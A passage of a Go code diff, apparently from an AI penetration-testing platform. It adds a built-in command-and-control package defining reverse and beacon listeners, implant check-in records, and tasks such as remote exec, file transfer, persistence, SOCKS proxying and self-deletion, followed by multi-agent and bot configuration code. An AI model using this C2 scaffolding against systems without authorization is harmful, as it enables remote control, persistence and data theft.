_ = conn.SetWriteDeadline(time.Now().Add(3 * time.Minute))
if err := writeTCPBeaconFrame(&writeMu, conn, enc); err != nil {
return
}
}
}
+258
View File
@@ -0,0 +1,258 @@
// Package c2 实现 CyberStrikeAI 内置 C2Command & Control)框架。
//
// 设计概述:
// - Manager 作为统一入口,被 internal/app 实例化并注入到所有需要操控 C2 的组件
// HTTP handler、MCP 工具、HITL 桥、攻击链记录器等)。
// - Listener 是抽象接口,下挂 tcp_reverse / http_beacon / https_beacon / websocket
// 等不同传输方式的具体实现,全部通过 listener.Registry 工厂创建。
// - 任务调度走数据库(c2_tasks 表)+ 内存事件总线(EventBus)混合:
// * 状态变化与历史记录靠 SQLite 实现持久化与重启恢复;
// * 高频实时通知(如新任务结果)通过 EventBus 推送给 SSE/WS 订阅者,避免轮询。
// - Crypto 层固定 AES-256-GCM,每个 Listener 独立 32 字节密钥;密钥仅服务端持有
// 和编译期注入到 implant,事件流不允许导出明文密钥。
package c2
import (
"errors"
"strings"
"time"
)
// ListenerType 监听器类型,与 c2_listeners.type 字段一致
type ListenerType string
const (
ListenerTypeTCPReverse ListenerType = "tcp_reverse"
ListenerTypeHTTPBeacon ListenerType = "http_beacon"
ListenerTypeHTTPSBeacon ListenerType = "https_beacon"
ListenerTypeWebSocket ListenerType = "websocket"
)
// AllListenerTypes 列出所有受支持的监听器类型,便于校验与前端枚举
func AllListenerTypes() []ListenerType {
return []ListenerType{
ListenerTypeTCPReverse,
ListenerTypeHTTPBeacon,
ListenerTypeHTTPSBeacon,
ListenerTypeWebSocket,
}
}
// IsValidListenerType 校验前端/MCP 入参是否为合法 type
func IsValidListenerType(t string) bool {
t = strings.ToLower(strings.TrimSpace(t))
for _, lt := range AllListenerTypes() {
if string(lt) == t {
return true
}
}
return false
}
// SessionStatus 与 c2_sessions.status 一致
type SessionStatus string
const (
SessionActive SessionStatus = "active"
SessionSleeping SessionStatus = "sleeping"
SessionDead SessionStatus = "dead"
SessionKilled SessionStatus = "killed"
)
// TaskStatus 与 c2_tasks.status 一致
type TaskStatus string
const (
TaskQueued TaskStatus = "queued"
TaskSent TaskStatus = "sent"
TaskRunning TaskStatus = "running"
TaskSuccess TaskStatus = "success"
TaskFailed TaskStatus = "failed"
TaskCancelled TaskStatus = "cancelled"
)
// TaskType 任务类型(与 beacon 端协商,避免硬编码字符串)
type TaskType string
const (
// 通用任务
TaskTypeExec TaskType = "exec" // 执行任意命令(shell -c
TaskTypeShell TaskType = "shell" // 交互式命令(保持 cwd
TaskTypePwd TaskType = "pwd" // 当前目录
TaskTypeCd TaskType = "cd" // 切目录
TaskTypeLs TaskType = "ls" // 列目录
TaskTypePs TaskType = "ps" // 列进程
TaskTypeKillProc TaskType = "kill_proc" // 杀进程
TaskTypeUpload TaskType = "upload" // 推文件到目标
TaskTypeDownload TaskType = "download" // 拉文件回本机
TaskTypeScreenshot TaskType = "screenshot" // 截图
TaskTypeSleep TaskType = "sleep" // 调整心跳节律
TaskTypeExit TaskType = "exit" // 让 implant 退出(不会自删二进制)
TaskTypeSelfDelete TaskType = "self_delete" // 退出 + 自删二进制(持久化清理)
// 高级任务
TaskTypePortFwd TaskType = "port_fwd"
TaskTypeSocksStart TaskType = "socks_start"
TaskTypeSocksStop TaskType = "socks_stop"
TaskTypeLoadAssembly TaskType = "load_assembly"
TaskTypePersist TaskType = "persist"
)
// AllTaskTypes 全部 task_type,便于工具 schema 列出 enum
func AllTaskTypes() []TaskType {
return []TaskType{
TaskTypeExec, TaskTypeShell,
TaskTypePwd, TaskTypeCd, TaskTypeLs, TaskTypePs, TaskTypeKillProc,
TaskTypeUpload, TaskTypeDownload, TaskTypeScreenshot,
TaskTypeSleep, TaskTypeExit, TaskTypeSelfDelete,
TaskTypePortFwd, TaskTypeSocksStart, TaskTypeSocksStop, TaskTypeLoadAssembly,
TaskTypePersist,
}
}
// IsDangerousTaskType 标记需要 HITL 二次确认的任务类型;
// 与 internal/handler/hitl.go 现有的 tool_whitelist 概念呼应:白名单外 → 走审批。
func IsDangerousTaskType(t TaskType) bool {
switch t {
case TaskTypeKillProc, TaskTypeUpload, TaskTypeSelfDelete,
TaskTypePortFwd, TaskTypeSocksStart, TaskTypeLoadAssembly, TaskTypePersist:
return true
}
return false
}
// ListenerConfig 解码后的监听器运行配置(来自 c2_listeners.config_json
type ListenerConfig struct {
// HTTP/HTTPS Beacon 公共字段
BeaconCheckInPath string `json:"beacon_check_in_path,omitempty"` // 默认 "/check_in"
BeaconTasksPath string `json:"beacon_tasks_path,omitempty"` // 默认 "/tasks"
BeaconResultPath string `json:"beacon_result_path,omitempty"` // 默认 "/result"
BeaconUploadPath string `json:"beacon_upload_path,omitempty"` // 默认 "/upload"
BeaconFilePath string `json:"beacon_file_path,omitempty"` // 默认 "/file/"
// HTTPS 专属
TLSCertPath string `json:"tls_cert_path,omitempty"`
TLSKeyPath string `json:"tls_key_path,omitempty"`
TLSAutoSelfSign bool `json:"tls_auto_self_sign,omitempty"` // true:找不到证书时自动生成自签
// 客户端默认参数(写到 c2_sessions 初值,beacon 也可在 check-in 时覆写)
DefaultSleep int `json:"default_sleep,omitempty"` // 秒,默认 5
DefaultJitter int `json:"default_jitter,omitempty"` // 0-100,默认 0
// OPSEC:可选命令黑名单(正则)
CommandDenyRegex []string `json:"command_deny_regex,omitempty"`
// 任务并发上限(每个会话同时下发的最大任务数,0 表示不限制)
MaxConcurrentTasks int `json:"max_concurrent_tasks,omitempty"`
// CallbackHost 植入端/Payload 使用的回连主机名(可选);与 bind_host 分离,便于 NAT/ECS 等场景
CallbackHost string `json:"callback_host,omitempty"`
}
// ApplyDefaults 对未填字段填默认值;调用方负责持久化时序列化新值
func (c *ListenerConfig) ApplyDefaults() {
if strings.TrimSpace(c.BeaconCheckInPath) == "" {
c.BeaconCheckInPath = "/check_in"
}
if strings.TrimSpace(c.BeaconTasksPath) == "" {
c.BeaconTasksPath = "/tasks"
}
if strings.TrimSpace(c.BeaconResultPath) == "" {
c.BeaconResultPath = "/result"
}
if strings.TrimSpace(c.BeaconUploadPath) == "" {
c.BeaconUploadPath = "/upload"
}
if strings.TrimSpace(c.BeaconFilePath) == "" {
c.BeaconFilePath = "/file/"
}
if c.DefaultSleep <= 0 {
c.DefaultSleep = 5
}
if c.DefaultJitter < 0 {
c.DefaultJitter = 0
}
if c.DefaultJitter > 100 {
c.DefaultJitter = 100
}
}
// ImplantCheckInRequest beacon → 服务端的注册/心跳请求体(已解密后的明文)
type ImplantCheckInRequest struct {
ImplantUUID string `json:"uuid"`
Hostname string `json:"hostname"`
Username string `json:"username"`
OS string `json:"os"`
Arch string `json:"arch"`
PID int `json:"pid"`
ProcessName string `json:"process_name"`
IsAdmin bool `json:"is_admin"`
InternalIP string `json:"internal_ip"`
UserAgent string `json:"user_agent,omitempty"`
SleepSeconds int `json:"sleep_seconds"`
JitterPercent int `json:"jitter_percent"`
Metadata map[string]interface{} `json:"metadata,omitempty"`
}
// ImplantCheckInResponse 服务端回执
type ImplantCheckInResponse struct {
SessionID string `json:"session_id"`
NextSleep int `json:"next_sleep"`
NextJitter int `json:"next_jitter"`
HasTasks bool `json:"has_tasks"`
ServerTime int64 `json:"server_time"`
}
// TaskEnvelope 服务端 → beacon 的任务派发载体
type TaskEnvelope struct {
TaskID string `json:"task_id"`
TaskType string `json:"task_type"`
Payload map[string]interface{} `json:"payload"`
}
// TaskResultReport beacon → 服务端的任务结果回传
type TaskResultReport struct {
TaskID string `json:"task_id"`
Success bool `json:"success"`
Output string `json:"output,omitempty"`
Error string `json:"error,omitempty"`
BlobBase64 string `json:"blob_b64,omitempty"` // 如截图二进制
BlobSuffix string `json:"blob_suffix,omitempty"` // 如 ".png"
StartedAt int64 `json:"started_at"`
EndedAt int64 `json:"ended_at"`
}
// CommonError C2 模块统一错误类型,便于 handler 层映射 HTTP 状态码
type CommonError struct {
Code string
Message string
HTTP int
}
func (e *CommonError) Error() string {
if e == nil {
return ""
}
return e.Message
}
// Sentinel errors,便于 errors.Is 比较
var (
ErrListenerNotFound = &CommonError{Code: "listener_not_found", Message: "监听器不存在", HTTP: 404}
ErrSessionNotFound = &CommonError{Code: "session_not_found", Message: "会话不存在", HTTP: 404}
ErrTaskNotFound = &CommonError{Code: "task_not_found", Message: "任务不存在", HTTP: 404}
ErrProfileNotFound = &CommonError{Code: "profile_not_found", Message: "Profile 不存在", HTTP: 404}
ErrInvalidInput = &CommonError{Code: "invalid_input", Message: "参数非法", HTTP: 400}
ErrAuthFailed = &CommonError{Code: "auth_failed", Message: "鉴权失败", HTTP: 401}
ErrPortInUse = &CommonError{Code: "port_in_use", Message: "端口已被占用", HTTP: 409}
ErrListenerRunning = &CommonError{Code: "listener_running", Message: "监听器已在运行", HTTP: 409}
ErrListenerStopped = &CommonError{Code: "listener_stopped", Message: "监听器未运行", HTTP: 409}
ErrUnsupportedType = &CommonError{Code: "unsupported_type", Message: "不支持的监听器类型", HTTP: 400}
)
// SafeBindPort 校验端口范围
func SafeBindPort(port int) error {
if port < 1 || port > 65535 {
return errors.New("port must be in 1..65535")
}
return nil
}
// NowUnixMillis 统一时间戳工具
func NowUnixMillis() int64 {
return time.Now().UnixNano() / int64(time.Millisecond)
}
+438 -20
View File
@@ -26,8 +26,10 @@ type Config struct {
Security SecurityConfig `yaml:"security"` Security SecurityConfig `yaml:"security"`
Database DatabaseConfig `yaml:"database"` Database DatabaseConfig `yaml:"database"`
Auth AuthConfig `yaml:"auth"` Auth AuthConfig `yaml:"auth"`
Audit AuditConfig `yaml:"audit,omitempty" json:"audit,omitempty"`
ExternalMCP ExternalMCPConfig `yaml:"external_mcp,omitempty"` ExternalMCP ExternalMCPConfig `yaml:"external_mcp,omitempty"`
Knowledge KnowledgeConfig `yaml:"knowledge,omitempty"` Knowledge KnowledgeConfig `yaml:"knowledge,omitempty"`
C2 C2Config `yaml:"c2,omitempty" json:"c2,omitempty"` // 内置 C2 总开关;未配置时默认启用
Robots RobotsConfig `yaml:"robots,omitempty" json:"robots,omitempty"` // 企业微信/钉钉/飞书等机器人配置 Robots RobotsConfig `yaml:"robots,omitempty" json:"robots,omitempty"` // 企业微信/钉钉/飞书等机器人配置
RolesDir string `yaml:"roles_dir,omitempty" json:"roles_dir,omitempty"` // 角色配置文件目录(新方式) RolesDir string `yaml:"roles_dir,omitempty" json:"roles_dir,omitempty"` // 角色配置文件目录(新方式)
Roles map[string]RoleConfig `yaml:"roles,omitempty" json:"roles,omitempty"` // 向后兼容:支持在主配置文件中定义角色 Roles map[string]RoleConfig `yaml:"roles,omitempty" json:"roles,omitempty"` // 向后兼容:支持在主配置文件中定义角色
@@ -38,9 +40,9 @@ type Config struct {
// MultiAgentConfig 基于 CloudWeGo Eino adk/prebuilt 的多代理编排(deep | plan_execute | supervisor,与单 Agent /agent-loop 并存)。 // MultiAgentConfig 基于 CloudWeGo Eino adk/prebuilt 的多代理编排(deep | plan_execute | supervisor,与单 Agent /agent-loop 并存)。
type MultiAgentConfig struct { type MultiAgentConfig struct {
Enabled bool `yaml:"enabled" json:"enabled"` Enabled bool `yaml:"enabled" json:"enabled"`
RobotUseMultiAgent bool `yaml:"robot_use_multi_agent" json:"robot_use_multi_agent"` // 为 true 时钉钉/飞书/企微机器人走 Eino 多代理 RobotDefaultAgentMode string `yaml:"robot_default_agent_mode,omitempty" json:"robot_default_agent_mode,omitempty"` // react | eino_single | deep | plan_execute | supervisor
BatchUseMultiAgent bool `yaml:"batch_use_multi_agent" json:"batch_use_multi_agent"` // 为 true 时批量任务队列中每子任务走 Eino 多代理 BatchUseMultiAgent bool `yaml:"batch_use_multi_agent" json:"batch_use_multi_agent"` // 为 true 时批量任务队列中每子任务走 Eino 多代理
// Orchestration 已弃用:保留仅兼容旧版 config.yaml;编排由聊天/WebShell 请求体 orchestration 决定,未传时按 deep。 // Orchestration 已弃用:保留仅兼容旧版 config.yaml;编排由聊天/WebShell 请求体 orchestration 决定,未传时按 deep。
Orchestration string `yaml:"orchestration,omitempty" json:"orchestration,omitempty"` Orchestration string `yaml:"orchestration,omitempty" json:"orchestration,omitempty"`
MaxIteration int `yaml:"max_iteration" json:"max_iteration"` // 主代理 / 执行器最大推理轮次(Deep、Supervisor、plan_execute 的 Executor MaxIteration int `yaml:"max_iteration" json:"max_iteration"` // 主代理 / 执行器最大推理轮次(Deep、Supervisor、plan_execute 的 Executor
@@ -62,6 +64,126 @@ type MultiAgentConfig struct {
EinoSkills MultiAgentEinoSkillsConfig `yaml:"eino_skills,omitempty" json:"eino_skills,omitempty"` EinoSkills MultiAgentEinoSkillsConfig `yaml:"eino_skills,omitempty" json:"eino_skills,omitempty"`
// EinoMiddleware wires optional ADK middleware (patchtoolcalls, toolsearch, plantask, reduction) and Deep extras. // EinoMiddleware wires optional ADK middleware (patchtoolcalls, toolsearch, plantask, reduction) and Deep extras.
EinoMiddleware MultiAgentEinoMiddlewareConfig `yaml:"eino_middleware,omitempty" json:"eino_middleware,omitempty"` EinoMiddleware MultiAgentEinoMiddlewareConfig `yaml:"eino_middleware,omitempty" json:"eino_middleware,omitempty"`
// EinoCallbacks attaches CloudWeGo eino callbacks.InitCallbacks on ADK Runner context (structured logs + optional SSE trace).
EinoCallbacks MultiAgentEinoCallbacksConfig `yaml:"eino_callbacks,omitempty" json:"eino_callbacks,omitempty"`
}
// MultiAgentEinoCallbacksConfig enables Eino unified callbacks on each ADK agent run (deep / plan_execute / supervisor / eino_single).
// Modes: log_only (zap + optional OTel; no SSE to browser), sse (adds client SSE eino_trace_* when sse_trace_to_client), full (sse rules + stream callback copies closed).
type MultiAgentEinoCallbacksConfig struct {
Enabled bool `yaml:"enabled" json:"enabled"`
Mode string `yaml:"mode,omitempty" json:"mode,omitempty"` // log_only | sse | full; empty with enabled=true defaults to log_only
// SseTraceToClient when true emits eino_trace_* SSE for UI (use only for admin/debug; nil/false recommended in production).
SseTraceToClient *bool `yaml:"sse_trace_to_client,omitempty" json:"sse_trace_to_client,omitempty"`
// Otel configures OpenTelemetry trace export (independent of mode; exporter none disables export even if enabled).
Otel MultiAgentEinoCallbacksOtelConfig `yaml:"otel,omitempty" json:"otel,omitempty"`
// MaxInputSummaryRunes / MaxOutputSummaryRunes cap text placed in SSE payloads and debug logs (not full payloads).
MaxInputSummaryRunes int `yaml:"max_input_summary_runes,omitempty" json:"max_input_summary_runes,omitempty"`
MaxOutputSummaryRunes int `yaml:"max_output_summary_runes,omitempty" json:"max_output_summary_runes,omitempty"`
// ZapVerbose when true logs input/output summaries at zap.Debug on start/end; false uses Info with short fields only.
ZapVerbose bool `yaml:"zap_verbose,omitempty" json:"zap_verbose,omitempty"`
}
// MultiAgentEinoCallbacksOtelConfig OpenTelemetry for Eino callback spans (W3C trace in collector / stdout).
type MultiAgentEinoCallbacksOtelConfig struct {
Enabled bool `yaml:"enabled" json:"enabled"`
ServiceName string `yaml:"service_name,omitempty" json:"service_name,omitempty"`
Exporter string `yaml:"exporter,omitempty" json:"exporter,omitempty"` // none | stdout | otlphttp
OTLPEndpoint string `yaml:"otlp_endpoint,omitempty" json:"otlp_endpoint,omitempty"` // host:port, e.g. localhost:4318 (path /v1/traces)
SampleRatio float64 `yaml:"sample_ratio,omitempty" json:"sample_ratio,omitempty"` // 01, default 1.0
}
// EinoCallbacksModeEffective returns off | log_only | sse | full.
func (c MultiAgentEinoCallbacksConfig) EinoCallbacksModeEffective() string {
if !c.Enabled {
return "off"
}
m := strings.TrimSpace(strings.ToLower(c.Mode))
switch m {
case "log_only":
return "log_only"
case "sse":
return "sse"
case "full":
return "full"
case "":
return "log_only"
default:
return "log_only"
}
}
// SseTraceToClientEffective is false unless explicitly set true (best practice: do not expose framework traces to end users by default).
func (c MultiAgentEinoCallbacksConfig) SseTraceToClientEffective() bool {
if c.SseTraceToClient == nil {
return false
}
return *c.SseTraceToClient
}
// ShouldEmitEinoTraceSSE is true when client-visible trace events should be sent over progress/SSE.
func (c MultiAgentEinoCallbacksConfig) ShouldEmitEinoTraceSSE(mode string) bool {
if !c.SseTraceToClientEffective() {
return false
}
return mode == "sse" || mode == "full"
}
// OtelExporterEffective returns none | stdout | otlphttp.
func (c MultiAgentEinoCallbacksOtelConfig) OtelExporterEffective() string {
e := strings.TrimSpace(strings.ToLower(c.Exporter))
switch e {
case "none", "stdout", "otlphttp":
return e
case "":
if c.Enabled {
return "stdout"
}
return "none"
default:
return "none"
}
}
// OtelTracingActive is true when spans should be started (enabled + non-none exporter).
func (c MultiAgentEinoCallbacksConfig) OtelTracingActive() bool {
if !c.Otel.Enabled {
return false
}
return c.Otel.OtelExporterEffective() != "none"
}
func (c MultiAgentEinoCallbacksOtelConfig) ServiceNameEffective() string {
s := strings.TrimSpace(c.ServiceName)
if s != "" {
return s
}
return "cyberstrike-ai"
}
func (c MultiAgentEinoCallbacksOtelConfig) SampleRatioEffective() float64 {
r := c.SampleRatio
if r <= 0 {
return 1.0
}
if r > 1 {
return 1.0
}
return r
}
func (c MultiAgentEinoCallbacksConfig) EinoCallbacksMaxInputSummaryRunes() int {
if c.MaxInputSummaryRunes > 0 {
return c.MaxInputSummaryRunes
}
return 400
}
func (c MultiAgentEinoCallbacksConfig) EinoCallbacksMaxOutputSummaryRunes() int {
if c.MaxOutputSummaryRunes > 0 {
return c.MaxOutputSummaryRunes
}
return 400
} }
// MultiAgentEinoMiddlewareConfig optional Eino ADK middleware and Deep / supervisor tuning. // MultiAgentEinoMiddlewareConfig optional Eino ADK middleware and Deep / supervisor tuning.
@@ -72,6 +194,8 @@ type MultiAgentEinoMiddlewareConfig struct {
ToolSearchEnable bool `yaml:"tool_search_enable,omitempty" json:"tool_search_enable,omitempty"` ToolSearchEnable bool `yaml:"tool_search_enable,omitempty" json:"tool_search_enable,omitempty"`
ToolSearchMinTools int `yaml:"tool_search_min_tools,omitempty" json:"tool_search_min_tools,omitempty"` // default 20; applies when len(tools) >= this ToolSearchMinTools int `yaml:"tool_search_min_tools,omitempty" json:"tool_search_min_tools,omitempty"` // default 20; applies when len(tools) >= this
ToolSearchAlwaysVisible int `yaml:"tool_search_always_visible,omitempty" json:"tool_search_always_visible,omitempty"` // default 12; first N tools stay always visible ToolSearchAlwaysVisible int `yaml:"tool_search_always_visible,omitempty" json:"tool_search_always_visible,omitempty"` // default 12; first N tools stay always visible
// ToolSearchAlwaysVisibleTools keeps specified tool names always visible (never hidden by tool_search).
ToolSearchAlwaysVisibleTools []string `yaml:"tool_search_always_visible_tools,omitempty" json:"tool_search_always_visible_tools,omitempty"`
// Plantask adds TaskCreate/Get/Update/List (file-backed under skills dir); requires eino_skills + local backend. // Plantask adds TaskCreate/Get/Update/List (file-backed under skills dir); requires eino_skills + local backend.
PlantaskEnable bool `yaml:"plantask_enable,omitempty" json:"plantask_enable,omitempty"` PlantaskEnable bool `yaml:"plantask_enable,omitempty" json:"plantask_enable,omitempty"`
// PlantaskRelDir relative to skills_dir for per-conversation task boards (default .eino/plantask). // PlantaskRelDir relative to skills_dir for per-conversation task boards (default .eino/plantask).
@@ -79,8 +203,25 @@ type MultiAgentEinoMiddlewareConfig struct {
// Reduction truncates/offloads large tool outputs (requires eino local backend for Write). // Reduction truncates/offloads large tool outputs (requires eino local backend for Write).
ReductionEnable bool `yaml:"reduction_enable,omitempty" json:"reduction_enable,omitempty"` ReductionEnable bool `yaml:"reduction_enable,omitempty" json:"reduction_enable,omitempty"`
ReductionRootDir string `yaml:"reduction_root_dir,omitempty" json:"reduction_root_dir,omitempty"` // default: os temp + conversation id ReductionRootDir string `yaml:"reduction_root_dir,omitempty" json:"reduction_root_dir,omitempty"` // default: os temp + conversation id
ReductionMaxLengthForTrunc int `yaml:"reduction_max_length_for_trunc,omitempty" json:"reduction_max_length_for_trunc,omitempty"` // default 12000
ReductionMaxTokensForClear int `yaml:"reduction_max_tokens_for_clear,omitempty" json:"reduction_max_tokens_for_clear,omitempty"` // default 50000
ReductionClearExclude []string `yaml:"reduction_clear_exclude,omitempty" json:"reduction_clear_exclude,omitempty"` ReductionClearExclude []string `yaml:"reduction_clear_exclude,omitempty" json:"reduction_clear_exclude,omitempty"`
ReductionSubAgents bool `yaml:"reduction_sub_agents,omitempty" json:"reduction_sub_agents,omitempty"` // also attach to sub-agents ReductionSubAgents bool `yaml:"reduction_sub_agents,omitempty" json:"reduction_sub_agents,omitempty"` // also attach to sub-agents
// SummarizationTriggerRatio controls summarization trigger threshold as max_total_tokens * ratio (default 0.8).
SummarizationTriggerRatio float64 `yaml:"summarization_trigger_ratio,omitempty" json:"summarization_trigger_ratio,omitempty"`
// SummarizationEmitInternalEvents controls middleware internal event emission (default true).
SummarizationEmitInternalEvents *bool `yaml:"summarization_emit_internal_events,omitempty" json:"summarization_emit_internal_events,omitempty"`
// HistoryInputBudgetRatio 已不影响 Eino:从 last_react 轨迹转 ADK 消息时**不再**按 token 比例裁剪(完整注入)。
// 字段仍保留,便于旧版 config 不报错;新部署可省略。
HistoryInputBudgetRatio float64 `yaml:"history_input_budget_ratio,omitempty" json:"history_input_budget_ratio,omitempty"`
// PlanExecuteUserInputBudgetRatio caps planner/replanner/executor userInput prompt budget ratio (default 0.35).
PlanExecuteUserInputBudgetRatio float64 `yaml:"plan_execute_user_input_budget_ratio,omitempty" json:"plan_execute_user_input_budget_ratio,omitempty"`
// PlanExecuteExecutedStepsBudgetRatio caps executed_steps prompt budget ratio (default 0.2).
PlanExecuteExecutedStepsBudgetRatio float64 `yaml:"plan_execute_executed_steps_budget_ratio,omitempty" json:"plan_execute_executed_steps_budget_ratio,omitempty"`
// PlanExecuteMaxStepResultRunes caps each executed step result length for prompt view (default 4000).
PlanExecuteMaxStepResultRunes int `yaml:"plan_execute_max_step_result_runes,omitempty" json:"plan_execute_max_step_result_runes,omitempty"`
// PlanExecuteKeepLastSteps keeps only the tail steps in prompt view (default 8).
PlanExecuteKeepLastSteps int `yaml:"plan_execute_keep_last_steps,omitempty" json:"plan_execute_keep_last_steps,omitempty"`
// CheckpointDir when non-empty enables adk.Runner CheckPointStore (file-backed) for interrupt/resume persistence. // CheckpointDir when non-empty enables adk.Runner CheckPointStore (file-backed) for interrupt/resume persistence.
CheckpointDir string `yaml:"checkpoint_dir,omitempty" json:"checkpoint_dir,omitempty"` CheckpointDir string `yaml:"checkpoint_dir,omitempty" json:"checkpoint_dir,omitempty"`
// DeepOutputKey passed to deep.Config OutputKey (session final text); empty = off. // DeepOutputKey passed to deep.Config OutputKey (session final text); empty = off.
@@ -91,6 +232,97 @@ type MultiAgentEinoMiddlewareConfig struct {
TaskToolDescriptionPrefix string `yaml:"task_tool_description_prefix,omitempty" json:"task_tool_description_prefix,omitempty"` TaskToolDescriptionPrefix string `yaml:"task_tool_description_prefix,omitempty" json:"task_tool_description_prefix,omitempty"`
} }
func (c MultiAgentEinoMiddlewareConfig) SummarizationTriggerRatioEffective() float64 {
v := c.SummarizationTriggerRatio
if v <= 0 {
return 0.8
}
if v < 0.5 {
return 0.5
}
if v > 0.95 {
return 0.95
}
return v
}
func (c MultiAgentEinoMiddlewareConfig) SummarizationEmitInternalEventsEffective() bool {
if c.SummarizationEmitInternalEvents != nil {
return *c.SummarizationEmitInternalEvents
}
return true
}
func (c MultiAgentEinoMiddlewareConfig) HistoryInputBudgetRatioEffective() float64 {
v := c.HistoryInputBudgetRatio
if v <= 0 {
return 0.35
}
if v < 0.15 {
return 0.15
}
if v > 0.6 {
return 0.6
}
return v
}
func (c MultiAgentEinoMiddlewareConfig) PlanExecuteUserInputBudgetRatioEffective() float64 {
v := c.PlanExecuteUserInputBudgetRatio
if v <= 0 {
return 0.35
}
if v < 0.1 {
return 0.1
}
if v > 0.6 {
return 0.6
}
return v
}
func (c MultiAgentEinoMiddlewareConfig) PlanExecuteExecutedStepsBudgetRatioEffective() float64 {
v := c.PlanExecuteExecutedStepsBudgetRatio
if v <= 0 {
return 0.2
}
if v < 0.08 {
return 0.08
}
if v > 0.5 {
return 0.5
}
return v
}
func (c MultiAgentEinoMiddlewareConfig) PlanExecuteMaxStepResultRunesEffective() int {
if c.PlanExecuteMaxStepResultRunes > 0 {
return c.PlanExecuteMaxStepResultRunes
}
return 4000
}
func (c MultiAgentEinoMiddlewareConfig) PlanExecuteKeepLastStepsEffective() int {
if c.PlanExecuteKeepLastSteps > 0 {
return c.PlanExecuteKeepLastSteps
}
return 8
}
func (c MultiAgentEinoMiddlewareConfig) ReductionMaxLengthForTruncEffective() int {
if c.ReductionMaxLengthForTrunc > 0 {
return c.ReductionMaxLengthForTrunc
}
return 12000
}
func (c MultiAgentEinoMiddlewareConfig) ReductionMaxTokensForClearEffective() int {
if c.ReductionMaxTokensForClear > 0 {
return c.ReductionMaxTokensForClear
}
return 50000
}
// MultiAgentEinoSkillsConfig toggles Eino official skill progressive disclosure and host filesystem tools. // MultiAgentEinoSkillsConfig toggles Eino official skill progressive disclosure and host filesystem tools.
type MultiAgentEinoSkillsConfig struct { type MultiAgentEinoSkillsConfig struct {
// Disable skips skill middleware (and does not attach local FS tools for Deep). // Disable skips skill middleware (and does not attach local FS tools for Deep).
@@ -131,12 +363,26 @@ type MultiAgentSubConfig struct {
// MultiAgentPublic 返回给前端的精简信息(不含子代理指令全文)。 // MultiAgentPublic 返回给前端的精简信息(不含子代理指令全文)。
type MultiAgentPublic struct { type MultiAgentPublic struct {
Enabled bool `json:"enabled"` Enabled bool `json:"enabled"`
RobotUseMultiAgent bool `json:"robot_use_multi_agent"` RobotDefaultAgentMode string `json:"robot_default_agent_mode,omitempty"`
BatchUseMultiAgent bool `json:"batch_use_multi_agent"` BatchUseMultiAgent bool `json:"batch_use_multi_agent"`
SubAgentCount int `json:"sub_agent_count"` SubAgentCount int `json:"sub_agent_count"`
Orchestration string `json:"orchestration,omitempty"` Orchestration string `json:"orchestration,omitempty"`
PlanExecuteLoopMaxIterations int `json:"plan_execute_loop_max_iterations"` PlanExecuteLoopMaxIterations int `json:"plan_execute_loop_max_iterations"`
ToolSearchAlwaysVisibleTools []string `json:"tool_search_always_visible_tools,omitempty"`
ToolSearchAlwaysVisibleEffectiveTools []string `json:"tool_search_always_visible_effective_tools,omitempty"`
}
// NormalizeRobotAgentMode 解析机器人默认对话模式(react | eino_single | deep | plan_execute | supervisor);空值视为 react。
func NormalizeRobotAgentMode(ma MultiAgentConfig) string {
s := strings.TrimSpace(strings.ToLower(ma.RobotDefaultAgentMode))
if s == "" || s == "single" || s == "react" {
return "react"
}
if s == "eino_single" {
return "eino_single"
}
return NormalizeMultiAgentOrchestration(s)
} }
// NormalizeMultiAgentOrchestration 返回 deep、plan_execute 或 supervisor。 // NormalizeMultiAgentOrchestration 返回 deep、plan_execute 或 supervisor。
@@ -154,19 +400,48 @@ func NormalizeMultiAgentOrchestration(s string) string {
// MultiAgentAPIUpdate 设置页/API 仅更新多代理标量字段;写入 YAML 时不覆盖 sub_agents 等块。 // MultiAgentAPIUpdate 设置页/API 仅更新多代理标量字段;写入 YAML 时不覆盖 sub_agents 等块。
type MultiAgentAPIUpdate struct { type MultiAgentAPIUpdate struct {
Enabled bool `json:"enabled"` Enabled bool `json:"enabled"`
RobotUseMultiAgent bool `json:"robot_use_multi_agent"` RobotDefaultAgentMode string `json:"robot_default_agent_mode,omitempty"`
BatchUseMultiAgent bool `json:"batch_use_multi_agent"` BatchUseMultiAgent bool `json:"batch_use_multi_agent"`
PlanExecuteLoopMaxIterations *int `json:"plan_execute_loop_max_iterations,omitempty"` PlanExecuteLoopMaxIterations *int `json:"plan_execute_loop_max_iterations,omitempty"`
// 指针区分「JSON 未传该字段」与「传空数组要清空」;省略时不应覆盖 YAML 中的常驻工具白名单。
ToolSearchAlwaysVisibleTools *[]string `json:"tool_search_always_visible_tools,omitempty"`
} }
// RobotsConfig 机器人配置(企业微信、钉钉、飞书等) // RobotsConfig 机器人配置(企业微信、钉钉、飞书、微信 iLink 等)
type RobotsConfig struct { type RobotsConfig struct {
Session RobotSessionConfig `yaml:"session,omitempty" json:"session,omitempty"` // 机器人会话隔离策略
Wechat RobotWechatConfig `yaml:"wechat,omitempty" json:"wechat,omitempty"` // 微信(iLink 扫码绑定)
Wecom RobotWecomConfig `yaml:"wecom,omitempty" json:"wecom,omitempty"` // 企业微信 Wecom RobotWecomConfig `yaml:"wecom,omitempty" json:"wecom,omitempty"` // 企业微信
Dingtalk RobotDingtalkConfig `yaml:"dingtalk,omitempty" json:"dingtalk,omitempty"` // 钉钉 Dingtalk RobotDingtalkConfig `yaml:"dingtalk,omitempty" json:"dingtalk,omitempty"` // 钉钉
Lark RobotLarkConfig `yaml:"lark,omitempty" json:"lark,omitempty"` // 飞书 Lark RobotLarkConfig `yaml:"lark,omitempty" json:"lark,omitempty"` // 飞书
} }
// RobotWechatConfig 微信 iLink 机器人配置(个人微信 ClawBot / iLink 协议)
type RobotWechatConfig struct {
Enabled bool `yaml:"enabled" json:"enabled"`
BotToken string `yaml:"bot_token,omitempty" json:"bot_token,omitempty"`
ILinkBotID string `yaml:"ilink_bot_id,omitempty" json:"ilink_bot_id,omitempty"`
ILinkUserID string `yaml:"ilink_user_id,omitempty" json:"ilink_user_id,omitempty"`
BaseURL string `yaml:"base_url,omitempty" json:"base_url,omitempty"` // 默认 https://ilinkai.weixin.qq.com
BotType string `yaml:"bot_type,omitempty" json:"bot_type,omitempty"` // get_bot_qrcode 参数,默认 3
BotAgent string `yaml:"bot_agent,omitempty" json:"bot_agent,omitempty"` // base_info.bot_agent
GetUpdatesBuf string `yaml:"get_updates_buf,omitempty" json:"get_updates_buf,omitempty"` // 长轮询游标(运行时)
}
// RobotSessionConfig 机器人会话隔离策略
type RobotSessionConfig struct {
